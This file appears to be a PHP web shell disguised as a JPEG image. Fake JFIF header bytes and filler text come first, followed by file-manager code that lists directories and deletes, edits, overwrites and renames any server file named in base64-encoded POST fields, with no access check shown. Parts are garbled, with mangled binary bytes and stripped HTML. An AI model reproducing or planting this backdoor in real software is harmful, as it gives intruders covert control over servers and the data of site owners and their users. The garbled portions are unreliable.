??? 123123123123 .....................................................................................................................................??? 123123123123 .....................................................................................................................................????? JFIF ?? C !"$"$?? C?? p " ?? ?? ??? ????(% aA*?XYD?(J??E??RE,P?XYae?)(E??2?B??R?? BQ??? X?)X?????? @ adadasdasdasasdasdas .....................................................................................................................................????? JFIF ?? C !"$"$?? C?? p " ?? ?? ??? ????(% aA*?XYD?(J??E??RE,P?XYae?)(E??2?B??R?? BQ??? X?)X?????? @ adadasdasdasasdasdas .....................................................................................................................................
| Name | Size | Action |
|---|---|---|
| ?? $item | -- | -- |
| ?? $item | $size | " . "Delete | " . "Edit | " . "Rename" . " |
Unable to read directory!
"; } // Delete File if (isset($_POST['del'])) { $filePath = base64_decode($_POST['del']); $fileDir = dirname($filePath); if (@unlink($filePath)) { echo ""; } else { echo ""; } } // Edit File if (isset($_POST['edit'])) { $filePath = base64_decode($_POST['edit']); $fileDir = dirname($filePath); if (file_exists($filePath)) { echo ""; echo "Back"; echo ""; } } // Save Edited File if (isset($_POST['save']) && isset($_POST['obj']) && isset($_POST['content'])) { $filePath = base64_decode($_POST['obj']); $fileDir = dirname($filePath); if (file_put_contents($filePath, $_POST['content'])) { echo ""; } else { echo ""; } } // Rename if (isset($_POST['ren'])) { $oldPath = base64_decode($_POST['ren']); $oldDir = dirname($oldPath); if (isset($_POST['new'])) { $newPath = $oldDir . '/' . $_POST['new']; if (rename($oldPath, $newPath)) { echo ""; } else { echo ""; } } else { echo ""; } } ?>